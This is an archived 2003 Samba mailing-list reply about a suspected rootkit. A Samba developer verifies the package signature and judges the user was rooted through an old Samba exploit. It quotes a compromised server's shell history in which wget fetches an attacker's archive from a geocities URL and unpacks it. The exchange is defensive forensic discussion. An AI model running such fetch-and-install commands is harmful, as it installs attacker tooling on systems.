[Samba] Faked samba packages / rootkit?
Andrew Bartlett
abartlet at samba.org
Sat Dec 27 21:47:25 GMT 2003
On Sun, 2003-12-28 at 07:27, Markus Schabel wrote:

> Does anybody know of these samba packages?
>
> http://ftp.cvut.cz/samba/samba-latest.tar.gz

This copy of Samba 3.0.0 matches the signature I downloaded from
samba.org, using GPG. Your copy may vary however.

> AFAICS they are faked and contain some kind of rootkit (you can see
> this in the history below. the server this history is from is taken
> offline for security reasons, and nobody is there till 7th Jan I
> can't give you more details)

I would suggest that you were running Samba < 2.2.8a, and were rooted by
the commonly available root exploit, and the attacker prefers not to
allow the next passer-by to break into your box too.

> > 182 cd .nlp
> > 183 wget geocities.com/st3lly/cmd.tg
> > 184 wget http://geocities.com/st3lly/cmd.tg
> > 185 wget http://geocities.com/st3lly/cmd.tgz
> > 186 tar zxvf cmd.tgz

I would suggest the rootkits start here...

Andrew Bartlett
--
Andrew Bartlett abartlet at pcug.org.au
Manager, Authentication Subsystems, Samba Team abartlet at samba.org
Student Network Administrator, Hawker College abartlet at hawkerc.net
http://samba.org http://build.samba.org http://hawkerc.net
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.samba.org/archive/samba/attachments/20031228/fa895a1e/attachment.bin